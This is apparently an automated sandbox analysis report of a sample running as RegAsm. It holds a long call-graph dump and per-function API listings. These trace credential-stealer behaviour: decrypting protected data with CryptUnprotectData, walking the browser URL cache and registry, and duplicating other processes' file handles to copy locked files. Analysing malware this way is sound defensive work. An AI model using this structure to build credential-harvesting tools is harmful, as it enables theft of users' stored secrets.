40aec7 FindClose 38946->38948 38947->38401 38948->38947 38950 4099d7 38949->38950 38951 4099da memcpy 38949->38951 38950->38951 38951->38458 38953 40b2cc 27 API calls 38952->38953 38954 44543f 38953->38954 38955 409d1f 6 API calls 38954->38955 38956 44544f 38955->38956 39921 409b98 GetFileAttributesW 38956->39921 38958 44545e 38959 445476 38958->38959 38960 40b6ef 249 API calls 38958->38960 38961 40b2cc 27 API calls 38959->38961 38960->38959 38962 445482 38961->38962 38963 409d1f 6 API calls 38962->38963 38964 445492 38963->38964 39922 409b98 GetFileAttributesW 38964->39922 38966 4454a1 38967 4454b9 38966->38967 38968 40b6ef 249 API calls 38966->38968 38967->38478 38968->38967 38969->38477 38970->38501 38971->38507 38972->38542 38973->38522 38974->38570 38975->38570 38976->38553 38977->38583 38978->38585 38979->38587 38981 414c2e 16 API calls 38980->38981 38982 40c2ae 38981->38982 39038 40c1d3 38982->39038 38987 40c3be 39004 40a8ab 38987->39004 38988 40afcf 2 API calls 38989 40c2fd FindFirstUrlCacheEntryW 38988->38989 38990 40c3b6 38989->38990 38991 40c31e wcschr 38989->38991 38992 40b04b ??3@YAXPAX 38990->38992 38993 40c331 38991->38993 38994 40c35e FindNextUrlCacheEntryW 38991->38994 38992->38987 38996 40a8ab 9 API calls 38993->38996 38994->38991 38995 40c373 GetLastError 38994->38995 38997 40c3ad FindCloseUrlCache 38995->38997 38998 40c37e 38995->38998 38999 40c33e wcschr 38996->38999 38997->38990 39000 40afcf 2 API calls 38998->39000 38999->38994 39001 40c34f 38999->39001 39002 40c391 FindNextUrlCacheEntryW 39000->39002 39003 40a8ab 9 API calls 39001->39003 39002->38991 39002->38997 39003->38994 39132 40a97a 39004->39132 39007 40a8cc 39007->38594 39008 40a8d0 7 API calls 39008->39007 39137 40b1ab free free 39009->39137 39011 40c3dd 39012 40b2cc 27 API calls 39011->39012 39013 40c3e7 39012->39013 39138 414592 RegOpenKeyExW 39013->39138 39015 40c3f4 39016 40c50e 39015->39016 39017 40c3ff 39015->39017 39031 405337 39016->39031 39018 40a9ce 4 API calls 39017->39018 
39019 40c418 memset 39018->39019 39139 40aa1d 39019->39139 39022 40c471 39024 40c47a _wcsupr 39022->39024 39023 40c505 RegCloseKey 39023->39016 39025 40a8d0 7 API calls 39024->39025 39026 40c498 39025->39026 39027 40a8d0 7 API calls 39026->39027 39028 40c4ac memset 39027->39028 39029 40aa1d 39028->39029 39030 40c4e4 RegEnumValueW 39029->39030 39030->39023 39030->39024 39141 405220 39031->39141 39033 405340 39033->38608 39034->38605 39035->38607 39036->38608 39037->38601 39039 40ae18 9 API calls 39038->39039 39045 40c210 39039->39045 39040 40ae51 9 API calls 39040->39045 39041 40c264 39042 40aebe FindClose 39041->39042 39044 40c26f 39042->39044 39043 40add4 2 API calls 39043->39045 39050 40e5ed memset memset 39044->39050 39045->39040 39045->39041 39045->39043 39046 40c231 _wcsicmp 39045->39046 39047 40c1d3 34 API calls 39045->39047 39046->39045 39048 40c248 39046->39048 39047->39045 39063 40c084 21 API calls 39048->39063 39051 414c2e 16 API calls 39050->39051 39052 40e63f 39051->39052 39053 409d1f 6 API calls 39052->39053 39054 40e658 39053->39054 39064 409b98 GetFileAttributesW 39054->39064 39056 40e667 39057 409d1f 6 API calls 39056->39057 39059 40e680 39056->39059 39057->39059 39065 409b98 GetFileAttributesW 39059->39065 39060 40e68f 39061 40c2d8 39060->39061 39066 40e4b2 39060->39066 39061->38987 39061->38988 39063->39045 39064->39056 39065->39060 39087 40e01e 39066->39087 39068 40e593 39069 40e5b0 39068->39069 39070 40e59c DeleteFileW 39068->39070 39071 40b04b ??3@YAXPAX 39069->39071 39070->39069 39073 40e5bb 39071->39073 39072 40e521 39072->39068 39110 40e175 39072->39110 39075 40e5c4 CloseHandle 39073->39075 39076 40e5cc 39073->39076 39075->39076 39079 40b633 free 39076->39079 39077 40e540 39078 40e573 39077->39078 39130 40e2ab 30 API calls 39077->39130 39080 40e584 39078->39080 39081 40e57c CloseHandle 39078->39081 39082 40e5db 39079->39082 39131 40b1ab free free 39080->39131 39081->39080 39083 40b633 free 39082->39083 39085 40e5e3 39083->39085 39085->39061 
39088 406214 22 API calls 39087->39088 39089 40e03c 39088->39089 39090 40e16b 39089->39090 39091 40dd85 60 API calls 39089->39091 39090->39072 39092 40e06b 39091->39092 39092->39090 39093 40afcf ??2@YAPAXI ??3@YAXPAX 39092->39093 39094 40e08d OpenProcess 39093->39094 39095 40e0a4 GetCurrentProcess DuplicateHandle 39094->39095 39099 40e152 39094->39099 39096 40e0d0 GetFileSize 39095->39096 39097 40e14a CloseHandle 39095->39097 39100 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39096->39100 39097->39099 39098 40e160 39102 40b04b ??3@YAXPAX 39098->39102 39099->39098 39101 406214 22 API calls 39099->39101 39103 40e0ea 39100->39103 39101->39098 39102->39090 39104 4096dc CreateFileW 39103->39104 39105 40e0f1 CreateFileMappingW 39104->39105 39106 40e140 CloseHandle CloseHandle 39105->39106 39107 40e10b MapViewOfFile 39105->39107 39106->39097 39108 40e13b CloseHandle 39107->39108 39109 40e11f WriteFile UnmapViewOfFile 39107->39109 39108->39106 39109->39108 39111 40e18c 39110->39111 39112 406b90 11 API calls 39111->39112 39113 40e19f 39112->39113 39114 40e1a7 memset 39113->39114 39115 40e299 39113->39115 39121 40e1e8 39114->39121 39116 4069a3 ??3@YAXPAX free 39115->39116 39117 40e2a4 39116->39117 39117->39077 39118 406e8f 13 API calls 39118->39121 39119 406b53 SetFilePointerEx ReadFile 39119->39121 39120 40dd50 _wcsicmp 39120->39121 39121->39118 39121->39119 39121->39120 39122 40e283 39121->39122 39126 40742e 8 API calls 39121->39126 39127 40aae3 wcslen wcslen _memicmp 39121->39127 39128 40e244 _snwprintf 39121->39128 39123 40e291 39122->39123 39124 40e288 free 39122->39124 39125 40aa04 free 39123->39125 39124->39123 39125->39115 39126->39121 39127->39121 39129 40a8d0 7 API calls 39128->39129 39129->39121 39130->39077 39131->39068 39133 40a980 39132->39133 39134 40a8bb 39133->39134 39135 40a995 _wcsicmp 39133->39135 39136 40a99c wcscmp 39133->39136 39134->39007 39134->39008 39135->39133 39136->39133 39137->39011 39138->39015 39140 40aa23 RegEnumValueW 
39139->39140 39140->39022 39140->39023 39142 40522a 39141->39142 39167 405329 39141->39167 39143 40b2cc 27 API calls 39142->39143 39144 405234 39143->39144 39145 40a804 8 API calls 39144->39145 39146 40523a 39145->39146 39168 40b273 39146->39168 39148 405248 _mbscpy _mbscat 39149 40526c 39148->39149 39150 40b273 27 API calls 39149->39150 39151 405279 39150->39151 39152 40b273 27 API calls 39151->39152 39153 40528f 39152->39153 39154 40b273 27 API calls 39153->39154 39155 4052a5 39154->39155 39156 40b273 27 API calls 39155->39156 39157 4052bb 39156->39157 39158 40b273 27 API calls 39157->39158 39159 4052d1 39158->39159 39160 40b273 27 API calls 39159->39160 39161 4052e7 39160->39161 39162 40b273 27 API calls 39161->39162 39163 4052fd 39162->39163 39164 40b273 27 API calls 39163->39164 39165 405313 39164->39165 39166 40b273 27 API calls 39165->39166 39166->39167 39167->39033 39169 40b58d 27 API calls 39168->39169 39170 40b18c 39169->39170 39170->39148 39172 40440c FreeLibrary 39171->39172 39173 40436d 39172->39173 39174 40a804 8 API calls 39173->39174 39175 404377 39174->39175 39176 4043f7 39175->39176 39177 40b273 27 API calls 39175->39177 39176->38612 39176->38616 39178 40438d 39177->39178 39179 40b273 27 API calls 39178->39179 39180 4043a7 39179->39180 39181 40b273 27 API calls 39180->39181 39182 4043ba 39181->39182 39183 40b273 27 API calls 39182->39183 39184 4043ce 39183->39184 39185 40b273 27 API calls 39184->39185 39186 4043e2 39185->39186 39186->39176 39187 40440c FreeLibrary 39186->39187 39187->39176 39189 404413 FreeLibrary 39188->39189 39190 40441e 39188->39190 39189->39190 39190->38628 39191->38626 39193 40447e 39192->39193 39194 40442e 39192->39194 39195 404485 CryptUnprotectData 39193->39195 39196 40449c 39193->39196 39197 40b2cc 27 API calls 39194->39197 39195->39196 39196->38626 39198 404438 39197->39198 39199 40a804 8 API calls 39198->39199 39200 40443e 39199->39200 39201 40444f 39200->39201 39202 40b273 27 API calls 39200->39202 39201->39193 39203 
404475 FreeLibrary 39201->39203 39202->39201 39203->39193 39205 4135f6 39204->39205 39206 4135eb FreeLibrary 39204->39206 39205->38631 39206->39205 39208 4449c4 39207->39208 39226 444a48 39207->39226 39209 40b2cc 27 API calls 39208->39209 39210 4449cb 39209->39210 39211 40a804 8 API calls 39210->39211 39212 4449d1 39211->39212 39226->38651 39226->38652 39227->38662 39233 403a29 39232->39233 39247 403bed memset memset 39233->39247 39235 403a2f 39236 403ae7 39235->39236 39237 403a3f memset 39235->39237 39240 409d1f 6 API calls 39235->39240 39241 409b98 GetFileAttributesW 39235->39241 39242 40a8d0 7 API calls 39235->39242 39260 40b1ab free free 39236->39260 39237->39235 39239 403aef 39239->38668 39240->39235 39241->39235 39242->39235 39244 40a051 GetFileTime CloseHandle 39243->39244 39245 4039ca CompareFileTime 39243->39245 39244->39245 39245->38668 39246->38669 39248 414c2e 16 API calls 39247->39248 39249 403c38 39248->39249 39250 409719 2 API calls 39249->39250 39251 403c3f wcscat 39250->39251 39252 414c2e 16 API calls 39251->39252 39253 403c61 39252->39253 39254 409719 2 API calls 39253->39254 39255 403c68 wcscat 39254->39255 39261 403af5 39255->39261 39258 403af5 20 API calls 39259 403c95 39258->39259 39259->39235 39260->39239 39262 403b02 39261->39262 39263 40ae18 9 API calls 39262->39263 39269 403b37 39263->39269 39264 40ae51 9 API calls 39264->39269 39265 403bdb 39266 40aebe FindClose 39265->39266 39268 403be6 39266->39268 39267 40add4 wcscmp wcscmp 39267->39269 39268->39258 39269->39264 39269->39265 39269->39267 39270 40ae18 9 API calls 39269->39270 39271 40aebe FindClose 39269->39271 39272 40a8d0 7 API calls 39269->39272 39270->39269 39271->39269 39272->39269 39274 409d1f 6 API calls 39273->39274 39275 404190 39274->39275 39288 409b98 GetFileAttributesW 39275->39288 39277 40419c 39278 4041a7 6 API calls 39277->39278 39279 40435c 39277->39279 39280 40424f 39278->39280 39279->38696 39280->39279 39282 40425e memset 39280->39282 39284 409d1f 6 API calls 
39280->39284 39285 40a8ab 9 API calls 39280->39285 39289 414842 39280->39289 39282->39280 39283 404296 wcscpy 39282->39283 39283->39280 39284->39280 39286 4042b6 memset memset _snwprintf wcscpy 39285->39286 39286->39280 39287->38694 39288->39277 39292 41443e 39289->39292 39291 414866 39291->39280 39293 41444b 39292->39293 39294 414451 39293->39294 39295 4144a3 GetPrivateProfileStringW 39293->39295 39296 414491 39294->39296 39297 414455 wcschr 39294->39297 39295->39291 39299 414495 WritePrivateProfileStringW 39296->39299 39297->39296 39298 414463 _snwprintf 39297->39298 39298->39299 39299->39291 39300->38700 39302 40b2cc 27 API calls 39301->39302 39303 409615 39302->39303 39304 409d1f 6 API calls 39303->39304 39305 409625 39304->39305 39328 409b98 GetFileAttributesW 39305->39328 39307 409634 39310 409648 39307->39310 39345 4091b8 238 API calls 39307->39345 39309 40b2cc 27 API calls 39311 40965d 39309->39311 39310->39309 39312 408801 39310->39312 39313 409d1f 6 API calls 39311->39313 39312->38703 39312->38704 39314 40966d 39313->39314 39329 409b98 GetFileAttributesW 39314->39329 39316 40967c 39316->39312 39330 409529 39316->39330 39328->39307 39329->39316 39346 4096c3 CreateFileW 39330->39346 39332 409543 39333 4095cd 39332->39333 39334 409550 GetFileSize 39332->39334 39333->39312 39335 409577 CloseHandle 39334->39335 39336 40955f 39334->39336 39335->39333 39341 409585 39335->39341 39337 40afcf 2 API calls 39336->39337 39341->39333 39345->39310 39346->39332 39377 413f4f 39350->39377 39353 413f37 K32GetModuleFileNameExW 39354 413f4a 39353->39354 39354->38763 39356 413969 wcscpy 39355->39356 39357 41396c wcschr 39355->39357 39368 413a3a 39356->39368 39357->39356 39359 41398e 39357->39359 39381 4097f7 wcslen wcslen _memicmp 39359->39381 39361 41399a 39362 4139a4 memset 39361->39362 39363 4139e6 39361->39363 39382 409dd5 GetWindowsDirectoryW wcscpy 39362->39382 39364 413a31 wcscpy 39363->39364 39365 4139ec memset 39363->39365 39364->39368 39383 409dd5 
GetWindowsDirectoryW wcscpy 39365->39383 39368->38763 39369 4139c9 wcscpy wcscat 39369->39368 39370 413a11 memcpy wcscat 39370->39368 39372 413cb0 GetModuleHandleW 39371->39372 39373 413cda 39371->39373 39372->39373 39374 413cbf 39372->39374 39375 413ce3 GetProcessTimes 39373->39375 39376 413cf6 39373->39376 39374->39373 39375->38766 39376->38766 39378 413f2f 39377->39378 39379 413f54 39377->39379 39378->39353 39378->39354 39380 40a804 8 API calls 39379->39380 39380->39378 39381->39361 39382->39369 39383->39370 39384->38786 39385->38809 39387 409cf9 GetVersionExW 39386->39387 39388 409d0a 39386->39388 39387->39388 39388->38816 39388->38821 39389->38823 39390->38826 39391->38828 39392->38873 39394 40bba5 39393->39394 39528 40cc26 39394->39528 39397 40bd4b 39549 40cc0c 39397->39549 39402 40b2cc 27 API calls 39403 40bbef 39402->39403 39556 40ccf0 _wcsicmp 39403->39556 39405 40bbf5 39405->39397 39557 40ccb4 6 API calls 39405->39557 39407 40bc26 39408 40cf04 17 API calls 39407->39408 39409 40bc2e 39408->39409 39410 40bd43 39409->39410 39411 40b2cc 27 API calls 39409->39411 39412 40cc0c 4 API calls 39410->39412 39413 40bc40 39411->39413 39412->39397 39558 40ccf0 _wcsicmp 39413->39558 39415 40bc46 39415->39410 39416 40bc61 memset memset WideCharToMultiByte 39415->39416 39559 40103c strlen 39416->39559 39418 40bcc0 39419 40b273 27 API calls 39418->39419 39420 40bcd0 memcmp 39419->39420 39420->39410 39421 40bce2 39420->39421 39422 404423 37 API calls 39421->39422 39423 40bd10 39422->39423 39423->39410 39424 40bd3a LocalFree 39423->39424 39425 40bd1f memcpy 39423->39425 39424->39410 39425->39424 39426->38888 39428 4438b5 11 API calls 39427->39428 39429 44444c 39428->39429 39430 40b879 39429->39430 39619 415a6d 39429->39619 39430->38891 39430->38892 39432 4442e6 11 API calls 39434 44469e 39432->39434 39433 444486 39435 4444b9 memcpy 39433->39435 39472 4444a4 39433->39472 39434->39430 39437 443d90 110 API calls 39434->39437 39623 415258 39435->39623 39437->39430 39438 444524 
39439 444541 39438->39439 39440 44452a 39438->39440 39626 444316 39439->39626 39441 416935 16 API calls 39440->39441 39441->39472 39444 444316 18 API calls 39445 444563 39444->39445 39446 444316 18 API calls 39445->39446 39447 44456f 39446->39447 39448 444316 18 API calls 39447->39448 39449 44457f 39448->39449 39449->39472 39640 432d4e 39449->39640 39452 444316 18 API calls 39453 4445b0 39452->39453 39644 41eed2 39453->39644 39455 4445cf 39456 4445d6 39455->39456 39457 4445ee 39455->39457 39460 416935 16 API calls 39456->39460 39660 43302c 39457->39660 39460->39472 39461 43302c memset 39472->39432 39755 438460 39473->39755 39475 40b8a4 39475->38898 39499 4251c4 39475->39499 39477 443da3 39476->39477 39495 443db6 39476->39495 39843 41707a 11 API calls 39477->39843 39479 443da8 39480 443dbc 39479->39480 39481 443dac 39479->39481 39845 4300e8 memset memset memcpy 39480->39845 39844 4446ea 11 API calls 39481->39844 39484 443de0 39485 416935 16 API calls 39484->39485 39485->39495 39486 443dce 39486->39484 39490 443e22 39486->39490 39487 443e5a 39847 4300e8 memset memset memcpy 39487->39847 39490->39487 39846 41f0ac 102 API calls 39490->39846 39491 443e63 39492 416935 16 API calls 39491->39492 39493 443f3b 39492->39493 39493->39495 39848 42320f memset memcpy 39493->39848 39495->38891 39497 409a74 GetTempFileNameW 39496->39497 39498 409a66 GetWindowsDirectoryW 39496->39498 39497->38885 39498->39497 39849 424f07 39499->39849 39501 4251e4 39502 4251f7 39501->39502 39503 4251e8 39501->39503 39857 4250f8 39502->39857 39856 4446ea 11 API calls 39503->39856 39505 4251f2 39505->38923 39507 425209 39509 425249 39507->39509 39513 4250f8 126 API calls 39507->39513 39514 425287 39507->39514 39865 4384e9 134 API calls 39507->39865 39866 424f74 123 API calls 39507->39866 39508 415c7d 16 API calls 39508->39505 39509->39514 39867 424ff0 13 API calls 39509->39867 39513->39507 39514->39508 39515 425266 39515->39514 39868 415be9 memcpy 39515->39868 39517->38923 39518->38923 39519->38923 
39520->38923 39521->38923 39522->38923 39523->38923 39524->38923 39525->38923 39526->38898 39527->38920 39560 4096c3 CreateFileW 39528->39560 39530 40cc34 39531 40cc3d GetFileSize 39530->39531 39532 40bbca 39530->39532 39533 40afcf 2 API calls 39531->39533 39532->39397 39540 40cf04 39532->39540 39534 40cc64 39533->39534 39561 40a2ef ReadFile 39534->39561 39536 40cc71 39562 40ab4a MultiByteToWideChar 39536->39562 39538 40cc95 CloseHandle 39539 40b04b ??3@YAXPAX 39538->39539 39539->39532 39541 40b633 free 39540->39541 39542 40cf14 39541->39542 39568 40b1ab free free 39542->39568 39544 40cf1b 39546 40cfef 39544->39546 39548 40bbdd 39544->39548 39569 40cd4b 39544->39569 39547 40cd4b 14 API calls 39546->39547 39547->39548 39548->39397 39548->39402 39550 40b633 free 39549->39550 39551 40cc15 39550->39551 39552 40aa04 free 39551->39552 39553 40cc1d 39552->39553 39618 40b1ab free free 39553->39618 39555 40b7d4 memset CreateFileW 39555->38878 39555->38879 39556->39405 39557->39407 39558->39415 39559->39418 39560->39530 39561->39536 39563 40ab6b 39562->39563 39567 40ab93 39562->39567 39564 40a9ce 4 API calls 39563->39564 39565 40ab74 39564->39565 39566 40ab7c MultiByteToWideChar 39565->39566 39566->39567 39567->39538 39568->39544 39570 40cd7b 39569->39570 39603 40aa29 39570->39603 39572 40cef5 39573 40aa04 free 39572->39573 39574 40cefd 39573->39574 39574->39544 39576 40aa29 6 API calls 39577 40ce1d 39576->39577 39578 40aa29 6 API calls 39577->39578 39579 40ce3e 39578->39579 39580 40ce6a 39579->39580 39611 40abb7 wcslen memmove 39579->39611 39581 40ce9f 39580->39581 39614 40abb7 wcslen memmove 39580->39614 39583 40a8d0 7 API calls 39581->39583 39586 40ceb5 39583->39586 39584 40ce56 39612 40aa71 wcslen 39584->39612 39592 40a8d0 7 API calls 39586->39592 39588 40ce8b 39615 40aa71 wcslen 39588->39615 39589 40ce5e 39613 40abb7 wcslen memmove 39589->39613 39595 40cecb 39592->39595 39593 40ce93 39616 40abb7 wcslen memmove 39593->39616 39617 40d00b malloc memcpy free free 
39595->39617 39597 40cedd 39598 40aa04 free 39597->39598 39599 40cee5 39598->39599 39600 40aa04 free 39599->39600 39601 40ceed 39600->39601 39602 40aa04 free 39601->39602 39602->39572 39604 40aa33 39603->39604 39610 40aa63 39603->39610 39605 40aa44 39604->39605 39606 40aa38 wcslen 39604->39606 39607 40a9ce malloc memcpy free free 39605->39607 39606->39605 39608 40aa4d 39607->39608 39609 40aa51 memcpy 39608->39609 39608->39610 39609->39610 39610->39572 39610->39576 39611->39584 39612->39589 39613->39580 39614->39588 39615->39593 39616->39581 39617->39597 39618->39555 39620 415a77 39619->39620 39621 415a8d 39620->39621 39622 415a7e memset 39620->39622 39621->39433 39622->39621 39624 4438b5 11 API calls 39623->39624 39625 41525d 39624->39625 39625->39438 39627 444328 39626->39627 39628 444423 39627->39628 39629 44434e 39627->39629 39693 4446ea 11 API calls 39628->39693 39630 432d4e 3 API calls 39629->39630 39632 44435a 39630->39632 39634 444375 39632->39634 39639 44438b 39632->39639 39633 432d4e 3 API calls 39635 4443ec 39633->39635 39636 416935 16 API calls 39634->39636 39637 444381 39635->39637 39638 416935 16 API calls 39635->39638 39636->39637 39637->39444 39638->39637 39639->39633 39641 432d58 39640->39641 39643 432d65 39640->39643 39694 432cc4 memset memset memcpy 39641->39694 39643->39452 39645 41eee2 39644->39645 39646 415a6d memset 39645->39646 39647 41ef23 39646->39647 39648 415a6d memset 39647->39648 39659 41ef2d 39647->39659 39649 41ef42 39648->39649 39652 41ef49 39649->39652 39695 41b7d9 39649->39695 39651 41ef66 39651->39652 39653 41ef74 memset 39651->39653 39652->39659 39710 41b321 100 API calls 39652->39710 39654 41ef91 39653->39654 39657 41ef9e 39653->39657 39657->39652 39659->39455 39661 433033 39660->39661 39662 433042 39660->39662 39716 421f20 memset 39661->39716 39717 415a91 39662->39717 39665 43303f 39665->39461 39693->39637 39694->39643 39696 41b812 39695->39696 39704 41b884 39696->39704 39706 41b849 39696->39706 39711 444706 11 API calls 
39696->39711 39697 415a6d memset 39698 41b8c2 39697->39698 39699 41b980 39698->39699 39700 41b902 memcpy memcpy memcpy memcpy memcpy 39698->39700 39698->39706 39700->39699 39704->39697 39704->39706 39706->39651 39710->39659 39711->39704 39716->39665 39718 415a9d 39717->39718 39719 415ab3 39718->39719 39720 415aa4 memset 39718->39720 39719->39665 39720->39719 39767 41703f 39755->39767 39757 43847a 39758 43848a 39757->39758 39759 43847e 39757->39759 39774 438270 39758->39774 39804 4446ea 11 API calls 39759->39804 39764 4384bb 39765 438270 133 API calls 39764->39765 39766 438488 39765->39766 39766->39475 39768 417044 39767->39768 39769 41705c 39767->39769 39773 417055 39768->39773 39806 416760 11 API calls 39768->39806 39770 417075 39769->39770 39807 41707a 11 API calls 39769->39807 39770->39757 39773->39757 39775 415a91 memset 39774->39775 39776 43828d 39775->39776 39777 438297 39776->39777 39778 438341 39776->39778 39780 4382d6 39776->39780 39779 415c7d 16 API calls 39777->39779 39808 44358f 39778->39808 39782 438458 39779->39782 39783 4382fb 39780->39783 39784 4382db 39780->39784 39782->39766 39805 424f26 122 API calls 39782->39805 39839 415c23 memcpy 39783->39839 39785 416935 16 API calls 39784->39785 39787 4382e9 39785->39787 39789 415c7d 16 API calls 39787->39789 39788 438305 39791 44358f 19 API calls 39788->39791 39794 438318 39788->39794 39789->39777 39790 438373 39793 438383 39790->39793 39840 4300e8 memset memset memcpy 39790->39840 39791->39794 39797 4383cd 39793->39797 39841 415c23 memcpy 39793->39841 39794->39790 39834 43819e 39794->39834 39796 4383f5 39800 438404 39796->39800 39801 43841c 39796->39801 39797->39796 39842 42453e 122 API calls 39797->39842 39803 416935 16 API calls 39800->39803 39802 416935 16 API calls 39801->39802 39802->39777 39803->39777 39804->39766 39805->39764 39806->39773 39807->39768 39809 4435be 39808->39809 39811 443676 39809->39811 39814 4436ce 39809->39814 39817 442ff8 19 API calls 39809->39817 39818 44366c 39809->39818 39832 
[Control-flow graph rendering: node and edge list for the functions starting at 44360c, 44def7, 44dea5, 4148b6, 415304, 441b3f, 41493c, 4287c1, 417bc5 and 4147f3 (calls include memset, memcpy, memcmp, free, ??3@YAXPAX, FreeLibrary, FindResourceW, SizeofResource, LoadResource, LockResource, EnumResourceNamesW, SetFilePointer, ReadFile, GetLastError, UnmapViewOfFile, CloseHandle, Sleep, GetPrivateProfileIntW, _itow, WritePrivateProfileStringW); the graph itself is not recoverable as text]

Control-flow Graph

• Executed
• Not Executed
[Control-flow graph of the function at 0040DD85 (basic blocks 40dd85-40e01b; calls memset, CreateFileW, NtQuerySystemInformation, CloseHandle, GetCurrentProcessId, _wcsicmp, OpenProcess, GetCurrentProcess, DuplicateHandle and internal subroutines 409bca, 40afcf, 41352f, 413cfa, 413d4c, 40e6ad, 409c52, 413d29); the graph itself is not recoverable as text]
APIs
• memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
• CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
• NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
• CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
• GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
• _wcsicmp.MSVCRT ref: 0040DEB2
• _wcsicmp.MSVCRT ref: 0040DEC5
• _wcsicmp.MSVCRT ref: 0040DED8
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
• GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
• DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
• memset.MSVCRT ref: 0040DF5F
• CloseHandle.KERNEL32(C0000004), ref: 0040DF92
• _wcsicmp.MSVCRT ref: 0040DFB2
• CloseHandle.KERNEL32(00000104), ref: 0040DFF2
Strings
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
• String ID: dllhost.exe$taskhost.exe$taskhostex.exe
• API String ID: 2018390131-3398334509
• Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
• Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
• Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
• Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
APIs
  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
  • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
• GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
• free.MSVCRT ref: 00418803
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
• String ID:
• API String ID: 1355100292-0
• Opcode ID: 1567c4eabff52167ca9608279aac156b488c53421658029fcd1b3afb43c795bc
• Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
• Opcode Fuzzy Hash: 1567c4eabff52167ca9608279aac156b488c53421658029fcd1b3afb43c795bc
• Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
APIs
• CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: Library$Load$CryptDataDirectoryFreeSystemUnprotectmemsetwcscatwcscpy
• String ID:
• API String ID: 1945712969-0
• Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
• Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
• Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
• Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
APIs
• FindFirstFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
• FindNextFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFind$FirstNext
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1690352074-0
                                                                                                                                  • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                  • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
